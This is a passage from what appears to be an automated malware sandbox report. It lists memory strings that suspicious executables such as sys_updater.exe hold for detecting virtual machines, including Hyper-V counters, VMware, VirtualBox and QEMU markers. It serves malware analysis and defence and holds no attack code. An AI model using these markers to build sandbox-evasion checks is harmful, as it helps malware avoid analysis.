                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages49305
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor1/X
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServicellJ
                            Source: explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllPro
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service%/X
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000000.1784775730.00007FF7B6561000.00000020.00000001.01000000.00000009.sdmp, sys_updater.exe, 00000018.00000000.2275651489.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 0000001B.00000000.2357220632.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 0000001F.00000000.2438513793.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VBoxTrayM1
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Tim
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition8
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotfo
                            Source: sys_updater.exe, 0000001F.00000003.2801933921.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2808984641.0000020E47B7F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2808766531.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2801620413.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2801333286.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2802821804.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp | Binary or memory string: vmtoolsdM1
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisor1B
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BC3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5ABF000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V qbqdsitfxsrfbfn Bus$
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Hypervisor Root Partitiont
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor3@
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \qemu-ga.exe@\fq
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisori
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisorr:
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisorr=
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWuv
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JHyper-V Hypervisor Logical Processori/X
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sWDHyper-V Hypervisor Root Partitionows\+
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2Hyper-V VM Vid Partitionm
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JHyper-V Hypervisor Logical ProcessorH
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V qbqdsitfxsrfbfn Bus
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Hypervisor Root Partition\Win&
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Virtual Machine Bus Pipes`
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V qbqdsitfxsrfbfn Bus Pipes)
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe, 0000000A.00000002.1819425581.0000000004DC5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: DQEMu
                            Source: sys_updater.exe, 0000001B.00000003.2712059415.00000159F3429000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2712604847.00000159F3429000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2711491206.00000159F3422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache 
Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flu
                            Source: sys_updater.exe, 0000001F.00000003.2840033423.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2841814217.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2840639497.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2838230496.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2839786737.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2837566535.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2837380902.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 
Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot rea
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServiceY
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service&Al
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionl
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service"C
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V qbqdsitfxsrfbfn Bus Pipes
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorZ
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipeshzh
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration ServicelS
                            Source: sys_updater.exe, 0000001F.00000003.2838845710.0000020E47C0E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2843023143.0000020E47C0E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2835803941.0000020E47C04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interru
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BC3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5ABF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F3592000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F3579000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E494F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service:|b ,
                            Source: sys_updater.exe, 0000001F.00000003.2838586237.0000020E47B64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated 